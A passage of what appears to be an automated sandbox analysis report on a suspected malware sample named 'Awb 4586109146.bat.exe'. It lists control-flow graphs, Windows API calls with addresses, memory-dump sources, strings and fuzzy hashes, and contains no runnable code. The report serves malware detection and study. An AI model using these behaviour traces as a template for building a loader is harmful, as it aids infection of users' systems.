164->151 165->164 178 405593-4055a7 ShowWindow 166->178 179 4055c7-4055e8 GetDlgItem SendMessageW 166->179 167->166 168->163 176 40571b-40572b GetWindowRect 169->176 177 40572e-405743 TrackPopupMenu 169->177 176->177 177->168 180 405749-405760 177->180 181 4055b6 178->181 182 4055a9-4055b4 ShowWindow 178->182 179->168 183 4055ee-405606 SendMessageW * 2 179->183 184 405765-405780 SendMessageW 180->184 185 4055bc-4055c2 call 404266 181->185 182->185 183->168 184->184 186 405782-4057a5 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 184->186 185->179 188 4057a7-4057ce SendMessageW 186->188 188->188 189 4057d0-4057e4 GlobalUnlock SetClipboardData CloseClipboard 188->189 189->168
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,00000403), ref: 004054BF
                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004054CE
                                                                    • GetClientRect.USER32(?,?), ref: 0040550B
                                                                    • GetSystemMetrics.USER32(00000002), ref: 00405512
                                                                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405533
                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405544
                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405557
                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405565
                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405578
                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040559A
                                                                    • ShowWindow.USER32(?,00000008), ref: 004055AE
                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004055CF
                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055DF
                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055F8
                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405604
                                                                    • GetDlgItem.USER32(?,000003F8), ref: 004054DD
                                                                      • Part of subcall function 00404266: SendMessageW.USER32(00000028,?,?,00404091), ref: 00404274
                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00405621
                                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_000053F5,00000000), ref: 0040562F
                                                                    • CloseHandle.KERNELBASE(00000000), ref: 00405636
                                                                    • ShowWindow.USER32(00000000), ref: 0040565A
                                                                    • ShowWindow.USER32(0001043E,00000008), ref: 0040565F
                                                                    • ShowWindow.USER32(00000008), ref: 004056A9
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056DD
                                                                    • CreatePopupMenu.USER32 ref: 004056EE
                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405702
                                                                    • GetWindowRect.USER32(?,?), ref: 00405722
                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040573B
                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405773
                                                                    • OpenClipboard.USER32(00000000), ref: 00405783
                                                                    • EmptyClipboard.USER32 ref: 00405789
                                                                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405795
                                                                    • GlobalLock.KERNEL32(00000000), ref: 0040579F
                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 004057B3
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004057D3
                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 004057DE
                                                                    • CloseClipboard.USER32 ref: 004057E4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                    • String ID: {
                                                                    • API String ID: 590372296-366298937
                                                                    • Opcode ID: d79c0185c0728b850bacb0f939067e3749861c5126489aa4a3835004506ab0c2
                                                                    • Instruction ID: 0d33ea325d25f8e5d5623e6ebdd73ca6fcd7ab1b09301a5b30cdd6c49ec902ff
                                                                    • Opcode Fuzzy Hash: d79c0185c0728b850bacb0f939067e3749861c5126489aa4a3835004506ab0c2
                                                                    • Instruction Fuzzy Hash: D7B15770900608FFDB119FA0DD89AAE7BB9FB48355F00403AFA41BA1A0CB755E51DF68
                                                                    APIs
                                                                      • Part of subcall function 7396121B: GlobalAlloc.KERNELBASE(00000040,?,7396123B,?,739612DF,00000019,739611BE,-000000A0), ref: 73961225
                                                                    • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 73961C6B
                                                                    • lstrcpyW.KERNEL32(00000008,?), ref: 73961CB3
                                                                    • lstrcpyW.KERNEL32(00000808,?), ref: 73961CBD
                                                                    • GlobalFree.KERNEL32(00000000), ref: 73961CD0
                                                                    • GlobalFree.KERNEL32(?), ref: 73961DB2
                                                                    • GlobalFree.KERNEL32(?), ref: 73961DB7
                                                                    • GlobalFree.KERNEL32(?), ref: 73961DBC
                                                                    • GlobalFree.KERNEL32(00000000), ref: 73961FA6
                                                                    • lstrcpyW.KERNEL32(?,?), ref: 73962140
                                                                    • GetModuleHandleW.KERNEL32(00000008), ref: 739621B5
                                                                    • LoadLibraryW.KERNEL32(00000008), ref: 739621C6
                                                                    • GetProcAddress.KERNEL32(?,?), ref: 73962220
                                                                    • lstrlenW.KERNEL32(00000808), ref: 7396223A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3746698006.0000000073961000.00000020.00000001.01000000.00000006.sdmp, Offset: 73960000, based on PE: true
                                                                    • Associated: 00000000.00000002.3746632612.0000000073960000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3746839235.0000000073964000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3746909776.0000000073966000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_73960000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                    • String ID:
                                                                    • API String ID: 245916457-0
                                                                    • Opcode ID: ce41b6c76a292eee586bf9fe128fd2ef06c781ef0940fc6ca32bba30b8eecf69
                                                                    • Instruction ID: e6183d6f3ad124b3bd6de3a66bc6e0db4a5397b05aa084dd3109ea2f73567965
                                                                    • Opcode Fuzzy Hash: ce41b6c76a292eee586bf9fe128fd2ef06c781ef0940fc6ca32bba30b8eecf69
                                                                    • Instruction Fuzzy Hash: 4122B972C0660ADFDB16CFA4C9807EEB7B9FB04385F10452ED1A6E7284D7749A808B53

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 712 4059cc-4059f2 call 405c97 715 4059f4-405a06 DeleteFileW 712->715 716 405a0b-405a12 712->716 717 405b88-405b8c 715->717 718 405a14-405a16 716->718 719 405a25-405a35 call 4062ba 716->719 720 405b36-405b3b 718->720 721 405a1c-405a1f 718->721 725 405a44-405a45 call 405bdb 719->725 726 405a37-405a42 lstrcatW 719->726 720->717 724 405b3d-405b40 720->724 721->719 721->720 727 405b42-405b48 724->727 728 405b4a-405b52 call 4065fd 724->728 729 405a4a-405a4e 725->729 726->729 727->717 728->717 735 405b54-405b68 call 405b8f call 405984 728->735 732 405a50-405a58 729->732 733 405a5a-405a60 lstrcatW 729->733 732->733 736 405a65-405a81 lstrlenW FindFirstFileW 732->736 733->736 752 405b80-405b83 call 405322 735->752 753 405b6a-405b6d 735->753 738 405a87-405a8f 736->738 739 405b2b-405b2f 736->739 740 405a91-405a99 738->740 741 405aaf-405ac3 call 4062ba 738->741 739->720 743 405b31 739->743 744 405a9b-405aa3 740->744 745 405b0e-405b1e FindNextFileW 740->745 754 405ac5-405acd 741->754 755 405ada-405ae5 call 405984 741->755 743->720 744->741 748 405aa5-405aad 744->748 745->738 751 405b24-405b25 FindClose 745->751 748->741 748->745 751->739 752->717 753->727 756 405b6f-405b7e call 405322 call 406080 753->756 754->745 757 405acf-405ad8 call 4059cc 754->757 765 405b06-405b09 call 405322 755->765 766 405ae7-405aea 755->766 756->717 757->745 765->745 769 405aec-405afc call 405322 call 406080 766->769 770 405afe-405b04 766->770 769->745 770->745
                                                                    APIs
                                                                    • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 004059F5
                                                                    • lstrcatW.KERNEL32(brainpower\indbefattende.Cob,\*.*,brainpower\indbefattende.Cob,?,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 00405A3D
                                                                    • lstrcatW.KERNEL32(?,0040A014,?,brainpower\indbefattende.Cob,?,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 00405A60
                                                                    • lstrlenW.KERNEL32(?,?,0040A014,?,brainpower\indbefattende.Cob,?,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 00405A66
                                                                    • FindFirstFileW.KERNELBASE(brainpower\indbefattende.Cob,?,?,?,0040A014,?,brainpower\indbefattende.Cob,?,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 00405A76
                                                                    • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405B16
                                                                    • FindClose.KERNEL32(00000000), ref: 00405B25
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                    • String ID: "C:\Users\user\Desktop\Awb 4586109146.bat.exe"$C:\Users\user\AppData\Local\Temp\$\*.*$brainpower\indbefattende.Cob
                                                                    • API String ID: 2035342205-3455809026
                                                                    • Opcode ID: b938c9d9068cedab339b19568100d2823c17cca8f6ff83e158d789dc8ab7bbfb
                                                                    • Instruction ID: 87b7c1c15068e6398432f2de95375e915c3ae258b511550e47b187391169d043
                                                                    • Opcode Fuzzy Hash: b938c9d9068cedab339b19568100d2823c17cca8f6ff83e158d789dc8ab7bbfb
                                                                    • Instruction Fuzzy Hash: EE41E430900914BACB21AB618C89ABF7778EF45768F50427FF801B11D1D77CA982DE6E
                                                                    APIs
                                                                    • FindFirstFileW.KERNELBASE(?,00430298,C:\,00405CE0,C:\,C:\,00000000,C:\,C:\,?,?,75573420,004059EC,?,C:\Users\user\AppData\Local\Temp\,75573420), ref: 00406608
                                                                    • FindClose.KERNEL32(00000000), ref: 00406614
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: Find$CloseFileFirst
                                                                    • String ID: C:\
                                                                    • API String ID: 2295610775-3404278061
                                                                    • Opcode ID: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                                                    • Instruction ID: 1ab566c2093321911261fd6ef708f8cedd572ce36bb67071c96f4f7979b88ecc
                                                                    • Opcode Fuzzy Hash: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                                                    • Instruction Fuzzy Hash: 3AD012315051205BC3401B386E0C85B7A599F55331B159F37F86AF51E0DB758C72869C
                                                                    APIs
                                                                    • CoCreateInstance.OLE32(004085F0,?,?,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                    Strings
                                                                    • C:\Users\user\AppData\Local\sillinesses, xrefs: 004021C3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: CreateInstance
                                                                    • String ID: C:\Users\user\AppData\Local\sillinesses
                                                                    • API String ID: 542301482-3064817632
                                                                    • Opcode ID: 85fa777544762f8280052d3ed6c1060dd403dfe718f2971fff495873814e0497
                                                                    • Instruction ID: 47658dbbd12ee8008517b47355d5d9d52026a5fb35fba2bce99957a22e6c3eef
                                                                    • Opcode Fuzzy Hash: 85fa777544762f8280052d3ed6c1060dd403dfe718f2971fff495873814e0497
                                                                    • Instruction Fuzzy Hash: 8B414C71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E0DBB99981CB44
                                                                    APIs
                                                                    • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: Window$EnableShow
                                                                    • String ID:
                                                                    • API String ID: 1136574915-0
                                                                    • Opcode ID: 476e1375ed2ebf99e134ffac4da93d8f4435b4a70c73a61f3ceb60b83f009d87
                                                                    • Instruction ID: 8ee55578b336c0276868c1e88f1fd45be51d25fee0972e3c110634e7b38d832d
                                                                    • Opcode Fuzzy Hash: 476e1375ed2ebf99e134ffac4da93d8f4435b4a70c73a61f3ceb60b83f009d87
                                                                    • Instruction Fuzzy Hash: 8BE01A72E082008FE724ABA5AA495AD77B8EB90325B20847FE211F11D1DA7858419F69
                                                                    APIs
                                                                    • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 00402877
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: FileFindFirst
                                                                    • String ID:
                                                                    • API String ID: 1974802433-0
                                                                    • Opcode ID: 1d203f80b4415f0f6344281a2a9e2fd09f6dd1f95b509643d07a0f28621ba8c6
                                                                    • Instruction ID: 0cd4a400be5c1b2ce6ea5bbb35e8853c3f48bcc8ff45a2cab7902aaadd26400c
                                                                    • Opcode Fuzzy Hash: 1d203f80b4415f0f6344281a2a9e2fd09f6dd1f95b509643d07a0f28621ba8c6
                                                                    • Instruction Fuzzy Hash: C8F08271A14104EFDB00EBA4DA499ADB378EF04314F6045BBF515F21D1DBB45D409B29

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 190 403d58-403d6a 191 403d70-403d76 190->191 192 403eab-403eba 190->192 191->192 193 403d7c-403d85 191->193 194 403f09-403f1e 192->194 195 403ebc-403f04 GetDlgItem * 2 call 404231 SetClassLongW call 40140b 192->195 196 403d87-403d94 SetWindowPos 193->196 197 403d9a-403d9d 193->197 199 403f20-403f23 194->199 200 403f5e-403f63 call 40427d 194->200 195->194 196->197 202 403db7-403dbd 197->202 203 403d9f-403db1 ShowWindow 197->203 205 403f25-403f30 call 401389 199->205 206 403f56-403f58 199->206 208 403f68-403f83 200->208 209 403dd9-403ddc 202->209 210 403dbf-403dd4 DestroyWindow 202->210 203->202 205->206 221 403f32-403f51 SendMessageW 205->221 206->200 207 4041fe 206->207 215 404200-404207 207->215 213 403f85-403f87 call 40140b 208->213 214 403f8c-403f92 208->214 218 403dde-403dea SetWindowLongW 209->218 219 403def-403df5 209->219 216 4041db-4041e1 210->216 213->214 224 403f98-403fa3 214->224 225 4041bc-4041d5 DestroyWindow EndDialog 214->225 216->207 223 4041e3-4041e9 216->223 218->215 226 403e98-403ea6 call 404298 219->226 227 403dfb-403e0c GetDlgItem 219->227 221->215 223->207 229 4041eb-4041f4 ShowWindow 223->229 224->225 230 403fa9-403ff6 call 4062dc call 404231 * 3 GetDlgItem 224->230 225->216 226->215 231 403e2b-403e2e 227->231 232 403e0e-403e25 SendMessageW IsWindowEnabled 227->232 229->207 260 404000-40403c ShowWindow KiUserCallbackDispatcher call 404253 EnableWindow 230->260 261 403ff8-403ffd 230->261 233 403e30-403e31 231->233 234 403e33-403e36 231->234 232->207 232->231 237 403e61-403e66 call 40420a 233->237 238 403e44-403e49 234->238 239 403e38-403e3e 234->239 237->226 242 403e7f-403e92 SendMessageW 238->242 243 403e4b-403e51 238->243 241 403e40-403e42 239->241 239->242 241->237 242->226 246 403e53-403e59 call 40140b 243->246 247 403e68-403e71 call 40140b 243->247 258 403e5f 246->258 247->226 256 403e73-403e7d 247->256 256->258 258->237 264 404041 260->264 265 40403e-40403f 260->265 261->260 266 404043-404071 GetSystemMenu EnableMenuItem SendMessageW 264->266 265->266 267 404073-404084 SendMessageW 266->267 268 404086 266->268 269 40408c-4040cb call 404266 call 403d39 call 4062ba lstrlenW call 4062dc SetWindowTextW call 401389 267->269 268->269 269->208 280 4040d1-4040d3 269->280 280->208 281 4040d9-4040dd 280->281 282 4040fc-404110 DestroyWindow 281->282 283 4040df-4040e5 281->283 282->216 285 404116-404143 CreateDialogParamW 282->285 283->207 284 4040eb-4040f1 283->284 284->208 286 4040f7 284->286 285->216 287 404149-4041a0 call 404231 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 285->287 286->207 287->207 292 4041a2-4041b5 ShowWindow call 40427d 287->292 294 4041ba 292->294 294->216
                                                                    APIs
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D94
                                                                    • ShowWindow.USER32(?), ref: 00403DB1
                                                                    • DestroyWindow.USER32 ref: 00403DC5
                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DE1
                                                                    • GetDlgItem.USER32(?,?), ref: 00403E02
                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403E16
                                                                    • IsWindowEnabled.USER32(00000000), ref: 00403E1D
                                                                    • GetDlgItem.USER32(?,?), ref: 00403ECB
                                                                    • GetDlgItem.USER32(?,00000002), ref: 00403ED5
                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 00403EEF
                                                                    • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403F40
                                                                    • GetDlgItem.USER32(?,00000003), ref: 00403FE6
                                                                    • ShowWindow.USER32(00000000,?), ref: 00404007
                                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404019
                                                                    • EnableWindow.USER32(?,?), ref: 00404034
                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 0040404A
                                                                    • EnableMenuItem.USER32(00000000), ref: 00404051
                                                                    • SendMessageW.USER32(?,000000F4,00000000,?), ref: 00404069
                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040407C
                                                                    • lstrlenW.KERNEL32(0042D248,?,0042D248,00000000), ref: 004040A6
                                                                    • SetWindowTextW.USER32(?,0042D248), ref: 004040BA
                                                                    • ShowWindow.USER32(?,0000000A), ref: 004041EE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
